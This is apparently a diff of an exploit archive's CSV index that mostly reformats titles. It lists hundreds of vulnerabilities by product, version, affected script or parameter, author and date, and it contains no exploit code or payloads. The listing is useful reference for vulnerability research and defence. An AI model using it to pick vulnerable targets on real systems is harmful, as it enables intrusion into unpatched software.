-25359,platforms/hardware/remote/25359.txt,"Linksys WET11 Password Update Remote Authentication Bypass",2005-04-07,"Kristian Hermansen",hardware,remote,0 +25359,platforms/hardware/remote/25359.txt,"Linksys WET11 - Password Update Remote Authentication Bypass",2005-04-07,"Kristian Hermansen",hardware,remote,0 25360,platforms/php/webapps/25360.txt,"PHP-Nuke 7.6 Web_Links Module - Multiple SQL Injection",2005-04-07,"Maksymilian Arciemowicz",php,webapps,0 -25361,platforms/irix/local/25361.txt,"SGI IRIX 6.5.22 GR_OSView Information Disclosure",2005-04-07,anonymous,irix,local,0 +25361,platforms/irix/local/25361.txt,"SGI IRIX 6.5.22 - GR_OSView Information Disclosure",2005-04-07,anonymous,irix,local,0 25362,platforms/irix/local/25362.txt,"SGI IRIX 6.5.22 - GR_OSView Local Arbitrary File Overwrite",2005-04-07,anonymous,irix,local,0 25363,platforms/windows/dos/25363.py,"Lan Messenger - sending PM Buffer Overflow (UNICODE) Overwrite SEH",2013-05-11,ariarat,windows,dos,0 25364,platforms/windows/dos/25364.txt,"AN HTTPD - CMDIS.DLL Remote Buffer Overflow",2005-04-08,"Tan Chew Keong",windows,dos,0 @@ -22534,9 +22529,9 @@ id,file,description,date,author,platform,type,port 25392,platforms/linux/remote/25392.c,"Salim Gasmi GLD 1.x - Postfix Greylisting Daemon Buffer Overflow",2005-04-12,Xpl017Elz,linux,remote,0 25393,platforms/multiple/dos/25393.txt,"XAMPP - Insecure Default Password Disclosure",2005-04-12,"Morning Wood",multiple,dos,0 25394,platforms/php/webapps/25394.txt,"Pinnacle Cart - Index.php Cross-Site Scripting",2005-04-12,SmOk3,php,webapps,0 -25395,platforms/multiple/remote/25395.txt,"Sun JavaMail 1.3.2 MimeBodyPart.getFileName Directory Traversal",2005-04-12,"Rafael San Miguel Carrasco",multiple,remote,0 +25395,platforms/multiple/remote/25395.txt,"Sun JavaMail 1.3.2 - MimeBodyPart.getFileName Directory Traversal",2005-04-12,"Rafael San Miguel Carrasco",multiple,remote,0 25396,platforms/multiple/remote/25396.txt,"Oracle 8.x/9.x/10.x - Database Multiple SQL Injection",2005-04-13,"Esteban Martinez Fayo",multiple,remote,0 -25397,platforms/multiple/remote/25397.txt,"Oracle Database 10.1 MDSYS.MD2.SDO_CODE_SIZE Buffer Overflow",2005-04-13,"Esteban Martinez Fayo",multiple,remote,0 +25397,platforms/multiple/remote/25397.txt,"Oracle Database 10.1 - MDSYS.MD2.SDO_CODE_SIZE Buffer Overflow",2005-04-13,"Esteban Martinez Fayo",multiple,remote,0 25398,platforms/php/webapps/25398.txt,"PHPBB2 Plus 1.5 - GroupCP.php Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 25399,platforms/php/webapps/25399.txt,"PHPBB2 Plus 1.5 - Index.php Multiple Cross-Site Scripting Vulnerabilities",2005-04-13,Dcrab,php,webapps,0 25400,platforms/php/webapps/25400.txt,"PHPBB2 Plus 1.5 - Portal.php Multiple Cross-Site Scripting Vulnerabilities",2005-04-13,Dcrab,php,webapps,0 @@ -22568,7 +22563,7 @@ id,file,description,date,author,platform,type,port 25427,platforms/asp/webapps/25427.txt,"OneWorldStore - OWContactUs.ASP Cross-Site Scripting",2005-04-14,Dcrab,asp,webapps,0 25428,platforms/asp/webapps/25428.txt,"OneWorldStore - OWListProduct.ASP Cross-Site Scripting",2005-04-14,Dcrab,asp,webapps,0 25429,platforms/linux/dos/25429.c,"Libsafe 2.0 Multi-threaded Process Race Condition Security Bypass Weakness",2005-04-15,Overflow.pl,linux,dos,0 -25430,platforms/php/webapps/25430.txt,"PHP-Nuke 7.6 Surveys Module HTTP Response Splitting",2005-04-15,Dcrab,php,webapps,0 +25430,platforms/php/webapps/25430.txt,"PHP-Nuke 7.6 Surveys Module - HTTP Response Splitting",2005-04-15,Dcrab,php,webapps,0 25431,platforms/php/webapps/25431.pl,"Ariadne CMS 2.4 - Remote File Inclusion",2006-10-19,"Fidel Costa",php,webapps,0 25432,platforms/php/webapps/25432.txt,"PHPBB Remote - Mod.php SQL Injection",2005-04-16,"tom cruise",php,webapps,0 25433,platforms/php/webapps/25433.txt,"Datenbank Module For PHPBB - Remote Mod.php Cross-Site Scripting",2005-04-16,"tom cruise",php,webapps,0 @@ -22602,11 +22597,11 @@ id,file,description,date,author,platform,type,port 25465,platforms/linux/dos/25465.txt,"Logwatch 2.6 Secure Script - Denial of Service",2005-04-20,anonymous,linux,dos,0 25466,platforms/asp/webapps/25466.txt,"ECommPro 3.0 - Admin/Login.ASP SQL Injection",2005-04-20,c0d3r,asp,webapps,0 25467,platforms/php/webapps/25467.txt,"Netref 4.2 - Cat_for_gen.php Remote PHP Script Injection",2005-04-20,jaguar,php,webapps,0 -25468,platforms/php/webapps/25468.txt,"PHP Labs proFile Dir URI Variable Cross-Site Scripting",2005-04-20,sNKenjoi,php,webapps,0 +25468,platforms/php/webapps/25468.txt,"PHP Labs - .proFile Dir URI Variable Cross-Site Scripting",2005-04-20,sNKenjoi,php,webapps,0 25469,platforms/php/webapps/25469.txt,"Ocean12 Calendar Manager 1.0 - Admin Form SQL Injection",2005-04-20,Zinho,php,webapps,0 25470,platforms/multiple/dos/25470.txt,"Neslo Desktop Rover 3.0 - Malformed Packet Remote Denial of Service",2005-04-20,"Adam Baldwin",multiple,dos,0 25472,platforms/windows/dos/25472.py,"Serva 32 TFTP 2.1.0 - Buffer Overflow Denial of Service",2013-05-15,Sapling,windows,dos,0 -25473,platforms/php/webapps/25473.txt,"PHP Labs proFile File URI Variable Cross-Site Scripting",2005-04-20,sNKenjoi,php,webapps,0 +25473,platforms/php/webapps/25473.txt,"PHP Labs - .proFile File URI Variable Cross-Site Scripting",2005-04-20,sNKenjoi,php,webapps,0 25474,platforms/php/webapps/25474.txt,"PHPBB-Auction Module 1.0/1.2 - Auction_Rating.php SQL Injection",2005-04-20,sNKenjoi,php,webapps,0 25475,platforms/php/webapps/25475.txt,"PHPBB-Auction Module 1.0/1.2 - Auction_Offer.php SQL Injection",2005-04-20,sNKenjoi,php,webapps,0 25476,platforms/asp/webapps/25476.txt,"DUportal Pro 3.4 - default.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 @@ -22622,7 +22617,7 @@ id,file,description,date,author,platform,type,port 25486,platforms/windows/remote/25486.txt,"RaidenFTPD 2.4 - Unauthorized File Access",2005-04-21,"Lachlan. H",windows,remote,0 25487,platforms/windows/remote/25487.txt,"yawcam 0.2.5 - Directory Traversal",2005-04-21,"Donato Ferrante",windows,remote,0 25488,platforms/php/webapps/25488.txt,"ProfitCode Software PayProCart 3.0 - Username Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 -25489,platforms/php/webapps/25489.txt,"ProfitCode Software PayProCart 3.0 Ckprvd Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 +25489,platforms/php/webapps/25489.txt,"ProfitCode Software PayProCart 3.0 - Ckprvd Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 25490,platforms/php/webapps/25490.txt,"ProfitCode Software PayProCart 3.0 - AdminShop HDoc Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 25491,platforms/php/webapps/25491.txt,"ProfitCode Software PayProCart 3.0 - AdminShop ModID Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 25492,platforms/php/webapps/25492.txt,"ProfitCode Software PayProCart 3.0 - AdminShop TaskID Cross-Site Scripting",2004-04-21,Lostmon,php,webapps,0 @@ -22679,9 +22674,9 @@ id,file,description,date,author,platform,type,port 25543,platforms/asp/webapps/25543.txt,"MetaCart2 - SearchAction.ASP Multiple SQL Injection",2005-04-26,Dcrab,asp,webapps,0 25544,platforms/asp/webapps/25544.txt,"MetaBid Auctions - intAuctionID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 25545,platforms/php/webapps/25545.txt,"BBlog 0.7.4 - PostID Parameter SQL Injection",2004-04-26,jericho+bblog@attrition.org,php,webapps,0 -25546,platforms/windows/remote/25546.txt,"BEA WebLogic Server 8.1 And WebLogic Express Administration Console Cross-Site Scripting",2005-04-26,"Alexander Kornbrust",windows,remote,0 +25546,platforms/windows/remote/25546.txt,"BEA WebLogic Server 8.1 / WebLogic Express Administration Console - Cross-Site Scripting",2005-04-26,"Alexander Kornbrust",windows,remote,0 25547,platforms/linux/remote/25547.pl,"Convert-UUlib 1.04/1.05 Perl Module - Buffer Overflow",2005-04-26,CorryL,linux,remote,0 -25548,platforms/php/webapps/25548.txt,"PHPCart Input Validation",2005-04-27,Lostmon,php,webapps,0 +25548,platforms/php/webapps/25548.txt,"PHPCart - Input Validation",2005-04-27,Lostmon,php,webapps,0 25549,platforms/php/webapps/25549.txt,"Claroline 1.5/1.6 - toolaccess_details.php tool Parameter XSS",2005-04-27,"Sieg Fried",php,webapps,0 25550,platforms/php/webapps/25550.txt,"Claroline 1.5/1.6 - user_access_details.php data Parameter XSS",2005-04-27,"Sieg Fried",php,webapps,0 25551,platforms/php/webapps/25551.txt,"Claroline 1.5/1.6 - myagenda.php coursePath Parameter XSS",2005-04-27,"Sieg Fried",php,webapps,0 @@ -22691,23 +22686,23 @@ id,file,description,date,author,platform,type,port 25555,platforms/php/webapps/25555.txt,"Dream4 Koobi CMS 4.2.3 - Index.php P Parameter SQL Injection",2005-04-27,"CENSORED Search Vulnerabilities",php,webapps,0 25556,platforms/php/webapps/25556.txt,"Dream4 Koobi CMS 4.2.3 - Index.php Q Parameter SQL Injection",2005-04-27,"CENSORED Search Vulnerabilities",php,webapps,0 25557,platforms/windows/remote/25557.txt,"HP OpenView Radia Management Portal 1.0/2.0 - Remote Command Execution",2005-04-28,"David Morgan",windows,remote,0 -25558,platforms/php/webapps/25558.txt,"Notes Module for PHPBB SQL Injection",2005-04-28,"James Bercegay",php,webapps,0 +25558,platforms/php/webapps/25558.txt,"Notes Module for PHPBB - SQL Injection",2005-04-28,"James Bercegay",php,webapps,0 25559,platforms/multiple/remote/25559.txt,"Oracle Application Server 9.0 - HTTP Service Mod_Access Restriction Bypass",2005-04-28,"Alexander Kornbrust",multiple,remote,0 25560,platforms/php/webapps/25560.txt,"Just William's Amazon Webstore - Closeup.php Image Parameter Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 25561,platforms/multiple/remote/25561.txt,"Oracle Application Server 9i Webcache - Arbitrary File Corruption",2005-04-28,"Alexander Kornbrust",multiple,remote,0 -25562,platforms/multiple/remote/25562.txt,"Oracle Application Server 9i Webcache Cache_dump_file Cross-Site Scripting",2005-04-28,"Alexander Kornbrust",multiple,remote,0 -25563,platforms/multiple/remote/25563.txt,"Oracle Application Server 9i Webcache PartialPageErrorPage Cross-Site Scripting",2005-04-28,"Alexander Kornbrust",multiple,remote,0 +25562,platforms/multiple/remote/25562.txt,"Oracle Application Server 9i - Webcache Cache_dump_file Cross-Site Scripting",2005-04-28,"Alexander Kornbrust",multiple,remote,0 +25563,platforms/multiple/remote/25563.txt,"Oracle Application Server 9i - Webcache PartialPageErrorPage Cross-Site Scripting",2005-04-28,"Alexander Kornbrust",multiple,remote,0 25564,platforms/php/webapps/25564.txt,"Just William's Amazon Webstore - CurrentIsExpanded Parameter Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 25565,platforms/php/webapps/25565.txt,"Just William's Amazon Webstore - SearchFor Parameter Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 25566,platforms/php/webapps/25566.txt,"Just William's Amazon Webstore - CurrentNumber Parameter Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 -25567,platforms/php/webapps/25567.txt,"Just William's Amazon Webstore HTTP Response Splitting",2005-04-28,Lostmon,php,webapps,0 +25567,platforms/php/webapps/25567.txt,"Just William's Amazon Webstore - HTTP Response Splitting",2005-04-28,Lostmon,php,webapps,0 25568,platforms/php/webapps/25568.txt,"phpCOIN 1.2 - login.php phpcoinsessid Parameter SQL Injection",2005-04-28,Dcrab,php,webapps,0 25569,platforms/php/webapps/25569.txt,"phpCOIN 1.2 Pages Module - Multiple Parameter SQL Injection",2005-04-28,Dcrab,php,webapps,0 25570,platforms/php/webapps/25570.txt,"JGS-Portal 3.0.1 - ID Variable SQL Injection",2005-04-30,admin@batznet.com,php,webapps,0 25571,platforms/windows/remote/25571.txt,"video cam server 1.0 - Directory Traversal",2005-05-02,"Donato Ferrante",windows,remote,0 25572,platforms/windows/remote/25572.txt,"Video Cam Server 1.0 - Path Disclosure",2005-05-02,"Donato Ferrante",windows,remote,0 25573,platforms/windows/remote/25573.txt,"Video Cam Server 1.0 - Administrative Interface Authentication Bypass",2005-05-02,"Donato Ferrante",windows,remote,0 -25574,platforms/multiple/remote/25574.txt,"Mtp-Target 1.2.2 Client Remote Format String",2005-05-02,"Luigi Auriemma",multiple,remote,0 +25574,platforms/multiple/remote/25574.txt,"Mtp-Target 1.2.2 Client - Remote Format String",2005-05-02,"Luigi Auriemma",multiple,remote,0 25575,platforms/php/webapps/25575.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - basket.php Multiple Parameter XSS",2005-05-02,Lostmon,php,webapps,0 25576,platforms/php/webapps/25576.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - page.php page Parameter XSS",2005-05-02,Lostmon,php,webapps,0 25577,platforms/php/webapps/25577.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - reviews.php Multiple Parameter XSS",2005-05-02,Lostmon,php,webapps,0 @@ -22741,16 +22736,16 @@ id,file,description,date,author,platform,type,port 25607,platforms/windows/local/25607.py,"Ophcrack 3.5.0 - Local Code Execution BOF",2013-05-21,xis_one,windows,local,0 25608,platforms/hardware/remote/25608.rb,"Linksys WRT160nv2 - apply.cgi Remote Command Injection",2013-05-21,Metasploit,hardware,remote,80 25609,platforms/hardware/remote/25609.rb,"D-Link DIR615h - OS Command Injection",2013-05-21,Metasploit,hardware,remote,80 -25611,platforms/windows/dos/25611.txt,"Win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase",2013-05-21,"Tavis Ormandy",windows,dos,0 +25611,platforms/windows/dos/25611.txt,"Windows - Win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase",2013-05-21,"Tavis Ormandy",windows,dos,0 30092,platforms/php/webapps/30092.txt,"FlashChat F_CMS 4.7.9 - Parameter Multiple Remote File Inclusion",2007-05-28,"Hasadya Raed",php,webapps,0 25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 - ASCII File Extension File Filter Circumvention",2005-06-14,d.schroeter@gmx.de,linux,remote,0 25821,platforms/php/webapps/25821.txt,"Annuaire 1Two 1.0/1.1 - Index.php Cross-Site Scripting",2005-06-14,An0nym0uS,php,webapps,0 25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence and Disclosure",2005-06-15,"Sverre H. Huseby",windows,remote,0 -25823,platforms/php/webapps/25823.txt,"McGallery 1.0/1.1 Lang Argument File Disclosure",2005-06-15,D_BuG,php,webapps,0 +25823,platforms/php/webapps/25823.txt,"McGallery 1.0/1.1 - Lang Argument File Disclosure",2005-06-15,D_BuG,php,webapps,0 25824,platforms/php/webapps/25824.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - Multiple Input Validation Vulnerabilities",2005-06-15,"GulfTech Security",php,webapps,0 25825,platforms/php/webapps/25825.txt,"Ultimate PHP Board 1.8/1.9 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,"Alberto Trivero",php,webapps,0 25612,platforms/php/webapps/25612.txt,"myBloggie 2.1 - index.php year Parameter XSS",2005-05-05,"Alberto Trivero",php,webapps,0 -25613,platforms/multiple/remote/25613.txt,"Oracle 9i/10g Database Fine Grained Audit Logging Failure",2005-05-05,"Alexander Kornbrust",multiple,remote,0 +25613,platforms/multiple/remote/25613.txt,"Oracle 9i/10g - Database Fine Grained Audit Logging Failure",2005-05-05,"Alexander Kornbrust",multiple,remote,0 25614,platforms/php/webapps/25614.txt,"MidiCart PHP - Search_List.php SearchString Parameter SQL Injection",2005-05-05,Exoduks,php,webapps,0 25615,platforms/php/webapps/25615.txt,"MidiCart PHP - Item_List.php MainGroup Parameter SQL Injection",2005-05-05,Exoduks,php,webapps,0 25616,platforms/php/webapps/25616.txt,"MidiCart PHP - Item_List.php SecondGroup Parameter SQL Injection",2005-05-05,Exoduks,php,webapps,0 @@ -22766,20 +22761,20 @@ id,file,description,date,author,platform,type,port 25626,platforms/osx/remote/25626.c,"4D WebStar 5.3/5.4 Tomcat Plugin - Remote Buffer Overflow",2005-05-06,"Braden Thomas",osx,remote,0 25627,platforms/php/remote/25627.txt,"PHP Advanced Transfer Manager 1.21 - Arbitrary File Upload",2005-05-06,tjomi4,php,remote,0 25628,platforms/jsp/webapps/25628.txt,"PHPBB 2.0.x - URL Tag BBCode.php",2005-05-09,Papados,jsp,webapps,0 -25629,platforms/windows/dos/25629.pl,"Orenosv HTTP/FTP Server 0.8.1 FTP Commands Remote Buffer Overflow",2008-05-08,Samsta,windows,dos,0 +25629,platforms/windows/dos/25629.pl,"Orenosv HTTP/FTP Server 0.8.1 - FTP Commands Remote Buffer Overflow",2008-05-08,Samsta,windows,dos,0 25630,platforms/php/webapps/25630.txt,"Advanced Guestbook 2.3.1/2.4 - Index.php Entry Parameter SQL Injection",2005-05-09,"Spy Hat",php,webapps,0 -25631,platforms/windows/dos/25631.txt,"Orenosv HTTP/FTP Server 0.8.1 CGISSI.EXE Remote Buffer Overflow",2005-05-09,"Tan Chew Keong",windows,dos,0 -25632,platforms/cgi/webapps/25632.txt,"Easy Message Board Directory Traversal",2005-05-09,"SoulBlack Group",cgi,webapps,0 +25631,platforms/windows/dos/25631.txt,"Orenosv HTTP/FTP Server 0.8.1 - CGISSI.EXE Remote Buffer Overflow",2005-05-09,"Tan Chew Keong",windows,dos,0 +25632,platforms/cgi/webapps/25632.txt,"Easy Message Board - Directory Traversal",2005-05-09,"SoulBlack Group",cgi,webapps,0 25633,platforms/windows/dos/25633.txt,"AOL Instant Messenger 4.x/5.x - Smiley Icon Location Remote Denial of Service",2005-05-09,fjlj@wvi.com,windows,dos,0 -25634,platforms/cgi/webapps/25634.txt,"Easy Message Board Remote Command Execution",2005-05-09,"SoulBlack Group",cgi,webapps,0 +25634,platforms/cgi/webapps/25634.txt,"Easy Message Board - Remote Command Execution",2005-05-09,"SoulBlack Group",cgi,webapps,0 25635,platforms/php/webapps/25635.txt,"PHP-Nuke 0-7 - Double Hex Encoded Input Validation",2005-05-09,fistfuxxer@gmx.de,php,webapps,0 -25636,platforms/windows/local/25636.txt,"Positive Software H-Sphere Winbox 2.4 Sensitive Logfile Content Disclosure",2005-05-09,"Morning Wood",windows,local,0 +25636,platforms/windows/local/25636.txt,"Positive Software H-Sphere Winbox 2.4 - Sensitive Logfile Content Disclosure",2005-05-09,"Morning Wood",windows,local,0 25637,platforms/php/webapps/25637.txt,"CodeThatShoppingCart 1.3.1 - catalog.php id Parameter XSS",2005-05-09,Lostmon,php,webapps,0 25638,platforms/php/webapps/25638.txt,"CodeThatShoppingCart 1.3.1 - catalog.php id Parameter SQL Injection",2005-05-09,Lostmon,php,webapps,0 25639,platforms/php/webapps/25639.txt,"PWSPHP 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-05-09,"SecuBox fRoGGz",php,webapps,0 25640,platforms/php/webapps/25640.txt,"PWSPHP 1.1/1.2 - Profil.php SQL Injection",2005-05-09,"SecuBox fRoGGz",php,webapps,0 25641,platforms/php/webapps/25641.txt,"WowBB 1.6 - View_User.php SQL Injection",2005-05-10,Megasky,php,webapps,0 -25642,platforms/php/webapps/25642.txt,"NukeET 3.0/3.1 Base64 Codigo Variable Cross-Site Scripting",2005-05-10,"Suko and Lostmon",php,webapps,0 +25642,platforms/php/webapps/25642.txt,"NukeET 3.0/3.1 - Base64 Codigo Variable Cross-Site Scripting",2005-05-10,"Suko and Lostmon",php,webapps,0 25643,platforms/windows/remote/25643.txt,"GeoVision Digital Surveillance System 6.0 4/6.1 - Unauthorized JPEG Image Access",2005-05-10,"Tirath Rai",windows,remote,0 25644,platforms/php/webapps/25644.txt,"e107 Website System 0.617 - Request.php Directory Traversal",2005-05-10,Heintz,php,webapps,0 25645,platforms/php/webapps/25645.txt,"e107 Website System 0.617 - Forum_viewforum.php SQL Injection",2005-05-10,Heintz,php,webapps,0 @@ -22789,7 +22784,7 @@ id,file,description,date,author,platform,type,port 25649,platforms/cgi/webapps/25649.txt,"showoff! digital media software 1.5.4 - Multiple Vulnerabilities",2011-05-11,dr_insane,cgi,webapps,0 25650,platforms/php/webapps/25650.txt,"Open Solution Quick.Cart 0.3 - Index.php Cross-Site Scripting",2005-05-11,Lostmon,php,webapps,0 25651,platforms/asp/webapps/25651.txt,"MaxWebPortal 1.3x - post.asp Multiple Parameter XSS",2005-05-11,Zinho,asp,webapps,0 -25652,platforms/windows/remote/25652.txt,"APG Technology ClassMaster Unauthorized Folder Access",2005-05-12,"Alex Garrett",windows,remote,0 +25652,platforms/windows/remote/25652.txt,"APG Technology ClassMaster - Unauthorized Folder Access",2005-05-12,"Alex Garrett",windows,remote,0 25653,platforms/php/webapps/25653.txt,"DirectTopics 2 - Topic.php SQL Injection",2005-05-12,"Morinex Eneco",php,webapps,0 25654,platforms/php/webapps/25654.txt,"Ultimate PHP Board 1.8/1.9 - ViewForum.php Cross-Site Scripting",2005-05-13,"Morinex Eneco",php,webapps,0 25655,platforms/php/webapps/25655.txt,"Ultimate PHP Board 1.8/1.9 - ViewForum.php SQL Injection",2005-05-13,"Morinex Eneco",php,webapps,0 @@ -22798,16 +22793,16 @@ id,file,description,date,author,platform,type,port 25658,platforms/windows/dos/25658.txt,"Yahoo! Messenger 5.x/6.0 - URL Handler Remote Denial of Service",2005-05-13,"Torseq Tech",windows,dos,0 25659,platforms/php/webapps/25659.txt,"PHPHeaven PHPMyChat 0.14.5 - Start-Page.CSS.php3 Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 25660,platforms/php/webapps/25660.txt,"PHPHeaven PHPMyChat 0.14.5 - Style.CSS.php3 Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 -25661,platforms/asp/webapps/25661.txt,"Keyvan1 ImageGallery Database Download",2005-05-01,"g0rellazz G0r",asp,webapps,0 +25661,platforms/asp/webapps/25661.txt,"Keyvan1 ImageGallery - Database Download",2005-05-01,"g0rellazz G0r",asp,webapps,0 25662,platforms/php/webapps/25662.txt,"Skull-Splitter Guestbook 1.0/2.0/2.2 - Multiple HTML Injection Vulnerabilities",2005-05-14,"Morinex Eneco",php,webapps,0 25663,platforms/php/webapps/25663.txt,"Shop-Script - CategoryID SQL Injection",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps,0 25664,platforms/php/webapps/25664.txt,"Shop-Script - ProductID SQL Injection",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps,0 -25665,platforms/php/webapps/25665.txt,"PostNuke 0.75/0.76 Blocks Module Directory Traversal",2005-05-16,pokley,php,webapps,0 +25665,platforms/php/webapps/25665.txt,"PostNuke 0.75/0.76 Blocks Module - Directory Traversal",2005-05-16,pokley,php,webapps,0 25666,platforms/cgi/webapps/25666.txt,"PServ 3.2 - Remote Source Code Disclosure",2005-05-16,"Claus R. F. Overbeck",cgi,webapps,0 25667,platforms/asp/webapps/25667.txt,"MetaCart E-Shop - ProductsByCategory.ASP Cross-Site Scripting",2005-05-16,"Dedi Dwianto",asp,webapps,0 25668,platforms/cgi/webapps/25668.txt,"Sigma ISP Manager 6.6 - Sigmaweb.DLL SQL Injection",2005-05-16,"mehran gashtasebi",cgi,webapps,0 25669,platforms/linux/remote/25669.txt,"pserv 3.2 - Directory Traversal",2005-05-16,"Claus R. F. Overbeck",linux,remote,0 -25670,platforms/multiple/remote/25670.html,"Mozilla Suite And Firefox DOM Property Overrides Code Execution",2005-05-16,moz_bug_r_a4,multiple,remote,0 +25670,platforms/multiple/remote/25670.html,"Mozilla Suite And Firefox - DOM Property Overrides Code Execution",2005-05-16,moz_bug_r_a4,multiple,remote,0 25671,platforms/php/webapps/25671.txt,"NPDS 4.8/5.0 - comments.php thold Parameter SQL Injection",2005-05-16,NoSP,php,webapps,0 25672,platforms/php/webapps/25672.txt,"NPDS 4.8/5.0 - pollcomments.php thold Parameter SQL Injection",2005-05-16,NoSP,php,webapps,0 25673,platforms/php/webapps/25673.txt,"JGS-Portal 3.0.1/3.0.2 - jgs_portal_statistik.php year Parameter SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 @@ -22831,22 +22826,22 @@ id,file,description,date,author,platform,type,port 25691,platforms/multiple/remote/25691.txt,"Warrior Kings 1.3 And Warrior Kings: Battles 1.23 - Remote Format String",2005-05-23,"Luigi Auriemma",multiple,remote,0 25692,platforms/multiple/dos/25692.txt,"Warrior Kings: Battles 1.23 - Remote Denial of Service",2005-05-23,"Luigi Auriemma",multiple,dos,0 25693,platforms/php/webapps/25693.txt,"GForge 3.x - Remote Arbitrary Command Execution",2005-05-24,"Filippo Spike Morelli",php,webapps,0 -25694,platforms/windows/remote/25694.txt,"Sambar Server 5.x/6.0/6.1 results.stm indexname XSS",2005-05-24,"Jamie Fisher",windows,remote,0 -25695,platforms/windows/remote/25695.txt,"Sambar Server 5.x/6.0/6.1 logout RCredirect XSS",2005-05-24,"Jamie Fisher",windows,remote,0 -25696,platforms/windows/remote/25696.txt,"Sambar Server 5.x/6.0/6.1 Server Referer XSS",2005-05-24,"Jamie Fisher",windows,remote,0 +25694,platforms/windows/remote/25694.txt,"Sambar Server 5.x/6.0/6.1 - results.stm indexname XSS",2005-05-24,"Jamie Fisher",windows,remote,0 +25695,platforms/windows/remote/25695.txt,"Sambar Server 5.x/6.0/6.1 - logout RCredirect XSS",2005-05-24,"Jamie Fisher",windows,remote,0 +25696,platforms/windows/remote/25696.txt,"Sambar Server 5.x/6.0/6.1 - Server Referer XSS",2005-05-24,"Jamie Fisher",windows,remote,0 25766,platforms/php/webapps/25766.txt,"Qualiteam X-Cart 4.0.8 - giftcert.php Multiple Parameter XSS",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 25697,platforms/windows/remote/25697.txt,"Blue Coat Reporter 7.0/7.1 - Remote Privilege Escalation",2005-05-24,"Oliver Karow",windows,remote,0 -25698,platforms/windows/remote/25698.txt,"Blue Coat Reporter 7.0/7.1 License HTML Injection",2005-05-24,"Oliver Karow",windows,remote,0 -25699,platforms/windows/dos/25699.txt,"Gearbox Software Halo Game Server 1.06/1.07 Infinite Loop Denial of Service",2005-05-24,"Luigi Auriemma",windows,dos,0 -25700,platforms/asp/webapps/25700.txt,"Spread The Word Multiple Cross-Site Scripting Vulnerabilities",2005-05-24,Lostmon,asp,webapps,0 +25698,platforms/windows/remote/25698.txt,"Blue Coat Reporter 7.0/7.1 - License HTML Injection",2005-05-24,"Oliver Karow",windows,remote,0 +25699,platforms/windows/dos/25699.txt,"Gearbox Software Halo Game Server 1.06/1.07 - Infinite Loop Denial of Service",2005-05-24,"Luigi Auriemma",windows,dos,0 +25700,platforms/asp/webapps/25700.txt,"Spread The Word - Multiple Cross-Site Scripting Vulnerabilities",2005-05-24,Lostmon,asp,webapps,0 25701,platforms/asp/webapps/25701.txt,"Spread The Word - Multiple SQL Injection",2005-05-24,Lostmon,asp,webapps,0 25702,platforms/java/webapps/25702.txt,"Sun JavaMail 1.x - Multiple Information Disclosure Vulnerabilities",2005-05-24,"Ricky Latt",java,webapps,0 25703,platforms/solaris/local/25703.txt,"Active News Manager - LOGIN.ASP SQL Injection",2005-05-25,Romty,solaris,local,0 25704,platforms/php/webapps/25704.txt,"PHP Poll Creator 1.0.1 - Poll_Vote.php Remote File Inclusion",2005-05-25,"rash ilusion",php,webapps,0 25705,platforms/asp/webapps/25705.txt,"FunkyASP AD Systems 1.1 - Login.ASP SQL Injection",2005-05-25,Romty,asp,webapps,0 -25706,platforms/linux/remote/25706.cpp,"GNU Mailutils 0.6 Mail Email Header Buffer Overflow",2004-08-10,infamous41md,linux,remote,0 +25706,platforms/linux/remote/25706.cpp,"GNU Mailutils 0.6 - Mail Email Header Buffer Overflow",2004-08-10,infamous41md,linux,remote,0 25707,platforms/linux/local/25707.txt,"Linux Kernel 2.6.x - Cryptoloop Information Disclosure",2005-05-26,"Markku-Juhani O. Saarinen",linux,local,0 -25708,platforms/multiple/remote/25708.txt,"Clever's Games Terminator 3: War of the Machines 1.16 Server Buffer Overflow",2005-05-26,"Luigi Auriemma",multiple,remote,0 +25708,platforms/multiple/remote/25708.txt,"Clever's Games Terminator 3: War of the Machines 1.16 Server - Buffer Overflow",2005-05-26,"Luigi Auriemma",multiple,remote,0 25709,platforms/linux/local/25709.sh,"Gentoo Webapp-Config 1.10 - Insecure File Creation",2005-05-26,"Eric Romang",linux,local,0 25710,platforms/multiple/remote/25710.txt,"C'Nedra 0.4 Network Plugin - Read_TCP_String Remote Buffer Overflow",2005-05-26,"Luigi Auriemma",multiple,remote,0 25711,platforms/hardware/dos/25711.txt,"Sony Ericsson P900 Beamer - Malformed File Name Handling Denial of Service",2005-05-26,"Marek Bialoglowy",hardware,dos,0 @@ -22891,7 +22886,7 @@ id,file,description,date,author,platform,type,port 25753,platforms/asp/webapps/25753.txt,"Hosting Controller 6.1 - resellerresources.asp jresourceid Parameter SQL Injection",2005-05-28,"GrayHatz Security Group",asp,webapps,0 25754,platforms/asp/webapps/25754.txt,"Hosting Controller 6.1 - plandetails.asp Information Disclosure",2005-05-28,"GrayHatz Security Group",asp,webapps,0 25755,platforms/windows/remote/25755.txt,"serverscheck 5.9/5.10 - Directory Traversal",2005-05-30,rgod,windows,remote,0 -25756,platforms/php/webapps/25756.txt,"India Software Solution Shopping Cart SQL 